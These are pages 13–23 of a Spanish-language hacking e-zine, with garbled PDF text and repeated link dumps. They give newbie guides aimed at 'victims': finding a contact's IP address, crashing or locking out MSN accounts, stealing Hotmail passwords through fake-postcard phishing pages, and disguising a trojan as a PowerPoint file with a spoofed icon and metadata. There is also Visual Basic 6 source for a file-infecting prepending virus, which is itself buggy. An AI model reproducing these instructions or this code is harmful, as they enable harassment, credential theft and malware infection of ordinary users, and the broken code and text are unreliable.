Utilidades MSN CUH e-zine 3 EdicionWindows Live MSN link:http://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEPLUS :
http://download.msgpluslive.net/setup/MsgPlusLive-422.exeIPGET :
http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108Si los links caducan con el tiempo www.softonic.comy www.google.com los encuentran fcilmenteInstalan todo, etc... Para ver el IP Get solo hay que ira los scrips de MSN situados ac:
En el momento de el envi abrimos el IP Get y nossaldr esto:
Y listo tendremos el IP de el
contacto =DOtros mtodos
Bueno podra estar escribiendo
mucho tiempo ya que hay muchos
mtodos, dar algunos ejemplos
IP CON HOTMAIL.
Bueno simplemente hagan esto (est
basado para Windows live Hotmail
en el antiguo es mas fcil aun, si
alguien quiere saber como se hace
que busque en el todopoderoso
Google) abajo estn los pasos a
seguir. En otros tipos de correo
como Yahoo, Gmail etc. no creo
que sea muy diferente.
En el punta de los cuadraditos de colores clickean yles sale eso
Paso 1- Cambiar a versin completa de WindowsLive Hotmail.
Bueno abrimos la ventana de MSN de
nuestra victima y le enviamos algo:Paso 2- Abrimos la bandeja de entrada y le damosclic derecho al mail al cual queramos saber el IP dequien lo enviPaso 3- Teniendo el clic derecho apretado, hacer clicen ver cdigo fuente y listo.
Bueno tambin estn los IP por lanzadores deexploits troyanos etc... Pero no viene al tema.Para este capitulo le agradezco a todos los quepostearon en el foro los diferentes links, y los postde los IP tambin, tambin pongo el link de ing.social dicho mas arriba
Link: http://foro.el-hacker.com/index.php/topic,61858.0.html
Post echo por Programar, yo aprend con ese post.Tambin se puede sacar la IP de alguien con accesofsico al computador pero eso depende de cada uno.Sacar IP con acceso fsico con Internet eswww.caulesmiip.comSin Internet inicio>ejecutar>cmd>escribimos ipconfigSi no se puede poner Inicio>panel de control>conexiones Internet, escogen la conexin de Internetque estn usando, le dan al clic derecho entran apropiedades, van a soporte y esta el IP, si nosimplemente con apretar con el clic derecho en laconexin abajo a la izquierda esta el IP.
Congelar MSN.
http://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEhttp://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEhttp://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://www.softonic.com/http://www.google.com/http://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://www.caulesmiip.com/http://www.caulesmiip.com/http://www.caulesmiip.com/http://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://foro.el-hacker.com/index.php/topic,61858.0.htmlhttp://www.google.com/http://www.softonic.com/http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://www.msgpluslive.net/scripts/browse/index.php?act=view&id=108http://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://download.msgpluslive.net/setup/MsgPlusLive-422.exehttp://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXEhttp://g.msn.com/8reen_us/ES/INSTALL_MSN_MESSENGER_DL.EXE -
8/14/2019 CUH E-zine 3 Edicion
14/69
Hacking Newbie
Utilidades MSN CUH e-zine 3 Edicion
Antes de todo yo les aviso que no estoy de acuerdocon este tipo de actividades.Muchos han escuchado del famoso programacongelador de MSN o tumba MSN ahora har unmanual donde explicare su uso desde 0.Empecemos por saber para que sirve, el programalo que hace es mandar una cantidad muy grande de
iconos gestuales de MSN hasta que el uso de cpullegue al 99% al llegar a eso el PC de la victima sequeda pegado /colgado (como lo quieran llamar).Bueno explicare paso a paso.Paso 1: Desactivar los iconos gestuales de el MSN(aprietan en su nick >opciones>mensajes>desactivariconos gestuales)Importante: Es muy importante que hagas eso , si noa ti tambin se te quedara pegada la PC , tambinaviso que en el momento de tumbar el MSN de tuvictima tu PC se quedara pegado poraproximadamente unos 40 segundos.
Paso 2: Abre solamente la ventana de tu victima yabre el congelador de msn
Y al apretar tumbar MSN, tu PC se quedar pegada40 seg., despus vers que tu victima se desconecto,y entrara de nuevo a msn, y se lo haces de nuevohasta que piense que es un virus xD.Nota: Normalmente los antivirus lo detectan como unVirus. Por qu? Se dice que es por que Microsoft lepago a las casas de Antivirus, ya que nadie ha dado
con la solucin para esto, piensa que si cada vesque te metes al MSN tienes que reiniciar el PC.Pero les aseguro que no es un virus solo desactivensu Antivirus y listo, yo lo use y no me paso nada si nolo uso ahora es por que no me parece adecuado.LINK DESCARGA DEL PROGRAMA:http://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.html
Bloquear MSN.Que es un bloqueador de MSN?Un bloqueador de MSN lo que hace es que tuvictima no pueda ingresar a su correo ni a su MSNmientras tengas el programa encendido con solo lanecesidad de tener su cuenta, sin necesidad de elpassword.
Como lo hace?: Este programa se basa en queHotmail tiene un bloqueo, si uno intenta iniciar sesinmuchas veces tu cuenta queda bloqueada de 1 a 5horas, si tienes el programa encendido lo intentarasiempre y hasta que no lo apagues el/ella no podrentrar.NOTA: Si bloqueaste a alguien y despus de 1 horaentro de nuevo solo cierra el programa y intntalode nuevo. Solamente se puede aplicar si la personaesta desconectada (si esta conectada solo usa elcongelador de mas arriba y en el momento que noeste usas el bloqueador y el no podr ingresar maso por ing. social dile que se salga 10 segundos)Explicare paso a paso el uso del programa.
Paso 1: Descargamos el programa de:http://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_es
Paso 2: Lo abrimos y ponemos el mail de tu victima(No puede estar conectada)
Listo, hasta que no lo saques no tendr ni
MSN ni Hotmail, si lo usas seguido a la
misma persona seguramente se terminara por
crear otra cuenta, espero que no les haga
problema desconectar a alguien de MSN.
Nota: Sus AV tambin lo detectaran como
virus, pero no les pasara nada se los aseguro.
Hackeo de MSN, las maneras menos complicadaspara newbiesEsto esta echo especialmente para un newbie, y sebasa en hackear a personas con poca experienciaen esto, como la mayora de la gente que usa elcomputador para escuchar musica, navegar, chatear,y usar el office.Empecemos por lo menos complicado que todospueden hacer, los llamados correos fake,generalmente se basan en postales, las cuales uno leenva un correo a alguien en el cual para ver lapostal hay que logearse a msn, las opciones de los
mejores correos fake o lanzadores de exploits son:
- Tu email (al cual te llegan las contraseas)-Email falso con el cual le llegar el correo (idealpara poner a alguien conocido de tu victima)- Nombre falso. (Con el cual le llegara el correo)
http://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGhttp://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGhttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://209.85.129.104/search?q=cache:NqV7fvJwIG8J:ciberadictos.spaces.live.com/blog/cns!71FE242F7B0E79C9!1428.entry+bloqueador+de+msn&hl=es&ct=clnk&cd=13&gl=cl&lr=lang_eshttp://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGhttp://www.4shared.com/file/25854858/97891d2a/Tumba_MSN.htmlGHJGHGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG -
8/14/2019 CUH E-zine 3 Edicion
15/69
Hacking Newbie
Utilidades MSN CUH e-zine 3 Edicion-Mail verdadero de tu victima.- Mensaje personal que estar en la postal.- Tipo de postal (gusanito, tarjetas bubba, tarjetasNIKO, invitaciones MSN Spaces)-Tipo de correo (Yahoo, Hotmail, Gmail)Listo.
Tutorial graficoEntramos a nuestra pgina de postales, y ponemoslas opciones,
Despus si todo salio bien nos saldr esto,(dependiendo se su Pg. de lanzadores)
Son muy fciles de usar, en el momento de que lavictima quiera leer la postal simplemente laredireccionar a una pgina similar a la de inicio deHotmail en la cual el/ella ingresar sus datos ydespus llegaran a tu bandeja de entrada,(dependiendo de la pgina de donde lo mandaste.)Donde encuentro lanzadores de exploits? (Webdonde ingreso los datos mencionados arriba ymanda la postal)www.google.com , www.cascanolahack.net,www.colombiahack.com etc.Ac tienen una contrasea que me llego, a mibandeja de entrada de mi correo
Gracias a cascanolahack, por su Pg. de
lanzadores.Otros mtodosEl famoso keylogger se basa en un programa el cuala travs de conexin cliente/servidor graba todo loque una persona escribe en su teclado ydependiendo del keylogger graba todas las pginas
Web ingresadas y deja tomar capturas de pantallacada cierto tiempo.
Ms informacin en:
Troyanos: http://foro.el-hacker.com/index.php/topic,85484.0.htmlExploits:http://foro.el-hacker.com/index.php/board,85.0.html
Con mucha imaginacin y con ing. social se puedeconseguir un pass solo es cosa de tiempo.
Trucos msn posteado por Chavero Cheva:http://foro.el-hacker.com/index.php/topic,14287.0.html
Bueno le doy las gracias a foro.el-hacker.com ytodos los usuarios y todo el excelente equipo demoderadores del foro, ya que gracias a esacomunidad aprend casi todo lo que se y me enseoa ver muchas cosas de forma diferente.Tambin repito que por opinin personal no estoy deacuerdo con algunas cosas mencionadas aqu, peroal ver en las Pg. que lo ms descargado es esto yque muchos entran a este mundo con intencionescomo estas les dejo esto para que aprendan bien.
Cualquier duda o [email protected] (solo recibo mails)Saludos RA19
http://www.google.com/http://www.cascanolahack.net/http://www.colombiahack.com/http://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/topic,14287.0.htmlhttp://foro.el-hacker.com/index.php/topic,14287.0.htmlmailto:[email protected]:[email protected]://foro.el-hacker.com/index.php/topic,14287.0.htmlhttp://foro.el-hacker.com/index.php/topic,14287.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/board,85.0.htmlhttp://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://foro.el-hacker.com/index.php/topic,85484.0.htmlhttp://www.colombiahack.com/http://www.cascanolahack.net/http://www.google.com/ -
8/14/2019 CUH E-zine 3 Edicion
16/69
Troyanos y virus
de troyanos CUH e-zine 3 EdicionCreacion
Crear y Encriptar Troyanos By Angelus_7722
CREAR Y ENCRIPTAR NUESTRO SERVERUna de las preguntas mas comunesal momento de crear y encriptarnuestro server, es como podemos
engaar a nuestra victima para queno sospeche al momento de abrir nuestroserver.Antes que todo, debemos tener en cuenta que el arteque envuelve a la ingeniera social es muyimportante al momento de tratar de conseguirnuestro cometido, pero no entrar en detalle ya queeste tema se ha tocado en anteriores e-zines.Lo que haremos es maquillar nuestro server paraque no sea tan sospechoso y para ello necesitaremosde las siguientes herramientas:
Server encriptado Presentacin Power Point (.pps) PowerPoint Slide Show Convert Iexpress MiTeC IconFactory Resoucer Hacker eXeScope
Utilic una presentacin de Power Point comoarchivo seuelo ya que a todo el mundo le encantaver este tipo de archivos, por esta razn esrecomendable no usar archivos de imgenes debidoa que en el explorador de windows, el msn ycorreos electrnicos, pueden pre visualizarimgenes, generando de esta manera sospechas,debido a que el archivo que estamos enviando es deextensin .exeBueno, lo primero que vamos a hacer es convertirnuestro archivo lo_mejor.pps en lo_mejor.exe, conel fin de poder utilizar el Iexpress como binder.Como todos saben, el Iexpress es una herramientapropia de Windows que podemos utilizar para uniro juntar dos archivos de extensiones .exe en uno solotambin de extensin .exe, convirtindose de estamanera en el binder perfecto, indetectable a los antivirus.Para ello utilizamos un programa llamadoPowerPoint Slide Show Converter, aunque existenmuchos mas que nos sirve para realizar este tipo deconversin.Abrimos Power Point Slide Show Converter:
Luego veremos el menu principal
Seleccionamos Simple Mode y veremos lo siguiente
Ahora solo debemos presionar el botn Make SlideShow para que realice la conversin.Una vez finalizada la conversin presionamos elbotn aceptar.
Al final veras el resultado de tu presentacin dePower Point, en un archivo aplicativo.
-
8/14/2019 CUH E-zine 3 Edicion
17/69
Troyanos y virus
de troyanos CUH e-zine 3 EdicionCreacion
Bueno, lo siguiente que haremos es bindear el serverencriptado (troyano) con lo_mejor.exe (seuelo).
No entro en detalle sobre la confifuracin ya que lainfo la puedes encontrar en foro.el-hacker.com.El resultado del bindeo es un archivo aplicativo oejecutable como el siguiente:
Lo siguiente que haremos es buscar el Icono depower point, el cual podremos extraer con unprograma muy bueno llamado MiTeCIconFactory
Lo siguiente que haremos es abrir el programa yseleccionar open desde File ubicado en el menprincipal.
Acontinuacion ubicaremos la carpeta de Microsoft
office para ubicar el icono de Power Point
Le damos doble clic a POWERPNT.EXE y veremostodos los iconos que maneja dicho programa. Eneste punto debemos seleccionar el icono quedeseamos y el de mayor tamao.
Lo que haremos ahora es guardar el icono para serutilizado mas adelante.
El resultado es un archivo con extensin .ico
El siguiente paso es cambiar el icono de nuestroserver, ya que el que tiene actualmente correspondeal asignado por el IExpress. Para poder hacer el
cambio utilizamos programa conocidos por todosque es el Resoucer Hacker.
-
8/14/2019 CUH E-zine 3 Edicion
18/69
Troyanos y virus
Creacion de troyanos CUH e-zine 3 Edicion
Lo que haremos es seleccionar el archivo al quequeremos cambiarle el icono, siendo en nuestro casoel server que ya bindeamos y que denominamoscomo Archivo_IExpress.exe.
Una ves seleccionado el archivo procedemoseliminar la carpeta AVI como lo muestra en la figura.
El siguiente paso consiste en cambiar el icono, asique debes seleccionar la opcin Replace Resource
Ahora lo que debemos hacer es cambiar el iconoactual por el icono de Power Point, para ello
oprimimos el botn Open File with new Icon.. yubicamos el archivo POWERPNT_4.ico
Despus solo debemos oprimir Replace
Como vern los iconos ya fueron cambiados y soloqueda guardar los cambio con la opcin save as yelegimos guardar sobre el ya existente es decir enArchivo_IExpress.exe.
Como se darn cuenta, saldr un mensajepreguntando si desean remplazar el archivo, al cual
debern darle yes. Al final y despus de refrescar laventana donde se encuntra nuestro server, veremosque su icono a cambiado.
-
8/14/2019 CUH E-zine 3 Edicion
19/69
Troyanos y virus
Creacion de troyanos CUH e-zine 3 Edicion
Si detallan el archivo podrn ver datos como Win32Cabnet Selft-Extractor y Microsoft Corporation,informacin que levantara sospechas. Para darsolucin a este inconveniente usaremos un programa
llamado eXeScope
Lo siguiente que haremos es dar en la X para cerrarel programa, pero antes de que se cierra nos pideconfirmar el cambio del tamao del archivo al cualle daremos aceptar
Lo que debemos hacer es abrir nuestro server coneste programa.
Al final obtendremos un archivo mas creble al quedebemos cambiarle el nombre por el original de lapresentacin de Power Point, lo_mejor.
Ahora lo que haremos es modificar algunos datospara mejorar su aspecto, FileDescription yCompanyName. Lo primero es dar un clic al botnderecho sobre FileDescription, seleccionamos editary escribimos lo que queramos, por ejemplo MicrosoftOffice, lo mismo hacemos con CompanyName, alcual lo cambiaremos por Power Point.
Aclaro que lo mas importante es la Ingeniera Socialque usemos con nuestras victimas, aunque un pocode ayuda no est mal.
SaludosAngelus_7722
Despus de modificarlo veremos algo como
-
8/14/2019 CUH E-zine 3 Edicion
20/69
Exploits
Conocimiento Basico De Exploits CUH e-zine 3 Edicion
Conocimiento Basico De Los ExploitsBy SkullMaster123CONOCIMIENTOS BSICOS DE
LOS EXPLOI TS,VULNERABILIDADES, ETC...
Saludos, bueno aqu les voy aexplicar conceptos bsicos de los exploits y otrascosas, ya que he visto que muchos users postean estolo otro, pues aqu les dejo ciertas cosas bsicas! Bueno comencemos:
Qu es un exploit?Los exploits son unas de las muchas maneras deexplotar alguna vulnerabilidad en un sistema, cuyaseguridad puede ser saltada por este.Al hablar de querer explotar un bug tienes que estarprogramado dicho exploit en el lenguajecorrespondiente y sin ningn error en sus lneas,existen formas diferentes de ejecutarlo ya sea local oremota.Exploit tambin viene de la palabra ingles, quesignifica explotar, este en realidad es un cdigomalicioso.
Qu es una Vulnerabilidad?una vulnerabilidad es una debilidad en losprocedimientos de seguridad, diseo,implementacin o control interno que podra serexplotada (accidental o intencionalmente) y queresulta en una brecha de seguridad o una violacinde la poltica de seguridad de sistemas
Explotar Forma Local:Este caso nuestro exploit esta en nuestra maquina, aeso se refiere el nombre, Un ejemplo bien visto sobreesta forma de explotar es la shell.
Explotar Remotamente:En este caso es lo contrario estaramos atacando aalgn servidor que tenga red, esto se realiza a travsde puerto, sean privilegiados o no.
Puertos Privilegios:Esto son menores que 1024, estos estn reservados alS.O
Puertos no privilegios:Estos son mayores que 1024.
Tipos de exploits:Aqu nombrare algunos exploits (Los que meacuerdoXD) su nombre y definicin, algunostambin, solo son vulnerabilidades o bugs:
Desbordamiento del Buffer:es un error de software que se produce cuando secopia una cantidad de datos sobre un rea que noes lo suficientemente grande para contenerlos,sobrescribiendo de esta manera otras zonas de
memoria. Como consecuencia, se producir unaexcepcin del acceso a memoria seguido de laterminacin del programa o, si se trata de un usuarioobrando con malas intenciones, la explotacin deuna vulnerabilidad o agujero de seguridad.Describiendo la tcnica:
Un desbordamiento de buffer ocurre cuando losdatos que se escriben en un buffer corrompenaquellos datos en direcciones de memoriaadyacentes a los destinados para el buffer, debido auna falta de validacin de los datos de entrada
Cross-site scripting o XSS:Esta es muy conocida, jeje y algunas personas laaprovechan, esto ocurre cuando hay unavulnerabilidad en el HTML o en la validacin de este.Originalmente abarcaba cualquier ataque quepermitiera ejecutar cdigo de "scripting", comoVBScript o javascript, en el contexto de otro dominio.
Inyeccin SQL:
Tambin es muy conocida y muy usada estavulnerabilidad, esta ocurre en el nivel de lavalidacin de las entradas a la base de datos de unaaplicacin.El origen es el filtrado incorrecto de las variablesutilizadas en las partes del programa con cdigoSQL. Es, de hecho, un error de una clase msgeneral de vulnerabilidades que puede ocurrir encualquier lenguaje de programacin o de script queest incrustado dentro de otro.(En este caso no seriaun exploit sino una vulnerabilidad)
Ataque DoS:Es un ataque a un sistema de ordenadores o red quecausa que un servicio o recurso sea inaccesible a los
http://es.wikipedia.org/wiki/Manejo_de_excepcioneshttp://es.wikipedia.org/wiki/Memoria_de_computadorahttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Exploithttp://es.wikipedia.org/wiki/Agujero_de_seguridadhttp://es.wikipedia.org/wiki/Datohttp://es.wikipedia.org/wiki/Direcci%C3%B3n_de_memoriahttp://es.wikipedia.org/w/index.php?title=Validaci%C3%B3n&action=edithttp://es.wikipedia.org/wiki/VBScripthttp://es.wikipedia.org/wiki/Javascripthttp://es.wikipedia.org/wiki/Base_de_datoshttp://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3nhttp://es.wikipedia.org/wiki/Lenguaje_interpretadohttp://es.wikipedia.org/wiki/Ordenadorhttp://es.wikipedia.org/wiki/Redhttp://es.wikipedia.org/wiki/Redhttp://es.wikipedia.org/wiki/Ordenadorhttp://es.wikipedia.org/wiki/Lenguaje_interpretadohttp://es.wikipedia.org/wiki/Lenguaje_de_programaci%C3%B3nhttp://es.wikipedia.org/wiki/Base_de_datoshttp://es.wikipedia.org/wiki/Javascripthttp://es.wikipedia.org/wiki/VBScripthttp://es.wikipedia.org/w/index.php?title=Validaci%C3%B3n&action=edithttp://es.wikipedia.org/wiki/Direcci%C3%B3n_de_memoriahttp://es.wikipedia.org/wiki/Datohttp://es.wikipedia.org/wiki/Agujero_de_seguridadhttp://es.wikipedia.org/wiki/Exploithttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Crackerhttp://es.wikipedia.org/wiki/Memoria_de_computadorahttp://es.wikipedia.org/wiki/Manejo_de_excepciones -
8/14/2019 CUH E-zine 3 Edicion
21/69
Exploits
Conocimiento Basico De Exploits CUH e-zine 3 Edicionusuarios legtimos. Normalmente provoca la prdidade la conectividad de la red por el consumo delancho de banda de la red de la vctima osobrecarga de los recursos computacionales delsistema de la vctima.
Se genera mediante la saturacin de los puertos conflujo de informacin, haciendo que el servidor se
sobrecargue y no pueda seguir prestando servicios,por eso se le dice "denegacin".
ROOT Exploit:Un rootkit es un utilidad que, archivos en formatoexe o bien ejecutables (como quiera llamarse) hansido previamente troyanizados por alguna personaque los program, con el fin de que sta personapueda permanecer indetectable al momento depermanecer en un sistema que va a comprometer.Esto es muy utilizado por aquellas personas que nocuenta con el conocimiento necesario para poderprogramar sus propias herramientas para que losmantengan ocultos. Algunos de estos rootkits puedenllegar a modificar el Kernel, llmese en Windows yLinux.
Link ROOT Exploit:http://rapidshare.com/files/40261958/rootexploits.rar.html
Escner de vulnerabilidades:Bueno este es un programa que muchas personasque exploten bugs etc deberan tener este escaneaalgn sitio Web y luego te da un informe de lasvulnerabilidades que tienes (Si es que tiene claro) yluego de vez en cuando te da un link de ese exploit!
Uno de esos programas es:
Shadow Security Scanner (O SSS)
- No basta Solo con Escanear una Pagina Webcon Shadow Security Scanner, Acunetix, uOtro, estos software son de auditoria, dejanun Log, Tremendo en la maquina remota, losadministradores de estos servidores, sisabrn quien escaneo, aunque utilices Proxy.
Que es un Proxy?el trmino Proxy hace referencia a un programa odispositivo que realiza una accin en representacin
de otro, en pocas palabras esto oculta tu IP.
Qu es un Xploit?
Esto NO es lo mismo que Exploit, un Xploit es unfake mail, Enviar correo electrnico falseando el
remitente. Se trata de una tcnica muy empleada enIngeniera Social. Para poder obtener contraseas deHotmail, yahoo o cualquier tipo de compaa paralos correos electrnicos.Al Enviar un mail y la victima hacer click este seridereccionaba automticamente al XPLOIT, el cualera una mascara , el Xploit le Peda los datos,exactamente igual como si fuese el Index de Hotmail,
Pero una vez Puesto, estas contraseas van al Emaildel Atacante, luego de ingresar, les sala un error, ytenan que volver a colocar la contrasea pero estavez, si era el Index de Hotmail, e ingresaban a susCorreos Normalmente.
Una gran diferencia que se ha de tomar en cuenta!
Dnde encuentro Exploits?Bueno hay muchas pginas donde descargarlos aqu
dejo algunas:
http://www.milw0rm.com/http://www.securityfocus.com/http://www.blacksheepnetworks.com/security/hack/
Bueno milworm es buena, pero primero para usarexploits tienes que leer muchos, tambin seria buenque supieras lenguaje de programacin en este casoC, ya que es uno de los mas utilizados para losExploits, y bueno leer, leer, leerOtra cosa nunca ejecutes un exploit si no sabes lo
que hace!
Bueno creo que este corto manual menciono ciertascosas importantes, hasta donde me acuerdo! Esperoque lo hallan disfrutado y entendido que es muyimportante, bueno un saludo a toda la C.U.H, y si mefalto algo disculpen!!
Y mis mas sinceras disculpas! ;)
By-SkullMaster123
http://es.wikipedia.org/wiki/Ancho_de_bandahttp://es.wikipedia.org/wiki/Servidorhttp://www.milw0rm.com/http://www.securityfocus.com/http://www.blacksheepnetworks.com/security/hack/http://www.blacksheepnetworks.com/security/hack/http://www.securityfocus.com/http://www.milw0rm.com/http://es.wikipedia.org/wiki/Servidorhttp://es.wikipedia.org/wiki/Ancho_de_banda -
8/14/2019 CUH E-zine 3 Edicion
22/69
Programacion VB
Infectar Ficheros Ejecutables CUH e-zine 3 Edicion
Infectar Ficheros Ejecutables En Windows By ANYD00MINFECTAR FICHEROS EJECUTABLES
Antes que nada me presento, soyANYD00M y les dejo un artculosobre como infectar ficherosejecutables de Windows utilizandoel lenguaje Visual Basic 6.0. El
siguiente artculo no fue creado confines de inclusin a algn virus aunque as seexponga, y debe ser utilizado solo con fineseducativos y de aprendizaje propio a tu persona. Porende debes hacerte responsable de tus acciones a lahora de utilizar el contenido, no nos comprometa ;-)
Lo que haremos ser crear una rutina para infectararchivos ejecutables (*.exe) de un sistema utilizandoVisual Basic 6.0. El mtodo que usaremos ser elprepending que se basa en introducir los bits del
virus sobre los bits del ejecutable original y luegointroducirle una marca para saber si esta infectado ono, normalmente al ejecutable a infectar se lodenomina host y as lo llamaremos nosotros tambin.Seguramente ya abran odo hablar del prepending yabran visto su esquema =P. Mirando el esquema sedarn una idea mas fluida de lo que estamoshablando, veamos los esquemas que nos indicaranlas 3 secuencias por las que pasa el ejecutable al serinfectado.
1er esquema, el fichero ejecutable en su estado
original: ---------------------------| HOST |---------------------------
2do esquema, al fichero se le agregan los bits delvirus:
---------------------------| VIRUS |---------------------------| HOST |---------------------------
3er esquema, se agrega una marca de infectado:---------------------------| VIRUS |
---------------------------| HOST |
---------------------------| MARCA |---------------------------
Bueno, quedo un poco feo, pero da una idea de loque estamos hablando. Lo terico es solo esto, y estoes lo nico que tienen que saber, ahora comencemosa programar.
Primero lo primeroPara comenzar debemos realizar los principios
bsicos, y comenzamos programando en elForm_Load. Para infectar debemos utilizar una copiadel virus que no se este ejecutando en memoria, sinoal intentar abrirlo el VB nos dar error. El cdigoestar comentado para no tener que cortarlo conexplicaciones:
Private Sub Form_Load ()'Declaramos las variables que usaremos.Dim Vx As String, PE As String
'Si nos estbamos ejecutando _
terminamos la aplicacinIf App.PrevInstance Then End
'Establecemos a Vx como la ruta completa _del virus.Vx = App.Path & "\" & App.EXEName & ".exe"
Copiamos el virus y reestablecemos el _valor de la variable.FileCopy Vx, C:\VIRUS.exeVx = C:\VIRUS.exe
'Establecemos a Pe como la ruta completa _del ejecutable a infectar.Pe = "C:\HOST.exe"
'Ya tenemos lo que necesitamos, ahora _solo debemos llamar a la Funcion que _infectara el archivo, pasndole como _parmetros la ruta del virus y la del _archivo a infectar (Pe o C:\HOST.exe)Call InfectarFichero(Vx, Pe)End Sub
Bien, ahora debemos crear la funcin que infectarael fichero (en este caso HOST.exe ubicado en la razC:\). A la Funcin le pasaremos dos parmetros, elprimero ser la ruta completa del virus y el segundo
-
8/14/2019 CUH E-zine 3 Edicion
23/69
Programacion VB
Infectar Ficheros Ejecutables CUH e-zine 3 Edicionser la ruta completa del fichero a infectar. Lo quehar esta funcin ser abrir de forma binaria elvirus, obtener sus bits y bytes, luego abrir el fichero ainfectar y agregarle los bits al principio y la marca alfinal.Eso fue fcil no?, ahora comencemos con la funcinprincipal:
Private Function InfectarFichero(Virus As String, HostAs String)'Declaramos variable/sDim Marca As String, BtsHost As String
'Establecemos la marcaMarca = "HOSTInfectado"
'Abrimos el fichero para saber si esta infectadoOpen Host For Binary Access Read As #1
'Obtenemos el tamao en bytes _del ficheroBtsHost = Space(LOF(1))'Obtenemos todo su contenido.Get #1, , BtsHost
'Cerramos el archivoClose #1
'Miramos si el archivo ya esta infectadoIf InStr(BtsHost, Marca) 0 Then
'Si esta infectado salimos.Exit Function
Else'Sino lo infectamos...
'Establecemos la variable aqu _ya que si la ponamos al inicio _y no la usbamos, gastbamos _espacio en memoria de gusto.Dim BtsVirus
'Abrimos de forma binaria el virusOpen Virus For Binary Access Read As #2
'Obtenemos el tamao (en bytes) usando _la funcin Len(Archivo)BtsVirus = Space(Len(Virus))'Obtenemos los bits...Get #2, , BstVirus
'Cerramos el archivoClose #2
'Abrimos el fichero para infectarloOpen Host For Binary Access Write As #3
'Ponemos los bits del virusPut #3, , BtsVirus'Ponemos los bits del originalPut #3, , BtsHost'Ponemos la marcaPut #3, , Marca
'cerramosClose #3
End IfEnd Function
Muy bien, con esto ya tenemos infectado el fichero.Pero Que pasa si queremos que cuando el usuarioejecute el fichero infectado, para no levantarsospechas se ejecute tambin el ejecutable original?.Para esto deberamos crear otra funcin que cree un
archivo temporal con los bits del fichero original, loejecute y lo elimine. As quedara en memoria el virusy el fichero infectado.Bueno, comencemos:
Function DesinfectarFichero(Pe As String)Dim Host As String
'Copiamos para poder abrirlo de forma _binaria.FileCopy Pe, "C:\Temporal.exe"
'Abrimos y extraemos los bits correspondientes _al Host.Open "C:\Temporal.exe" For Binary Access Read As#1
'Obtenemos los bits del host, pero ATENCION _para esto debemos saber los bits que tenia _nuestro virus al ser compilado, esto lo _pueden obtener en las propiedades ;)Host = Space(Len("C:\Temporal.exe") - 20382)'Obtenemos a Host.Get #1, , Host
'Cerramos
Close #1
'Ahora creamos otro fichero temporal para poner _el Host, no es necesario que exista anteriormente _ya que VB lo crea si no existe.Open "C:\HostTemporal.exe" For Binary AccessWrite As #2
'Ponemos los bits del hostPut #2, , Host
'CerramosClose #2
'Ejecutamos el FicheroShell "C:\HostTemporal.exe"
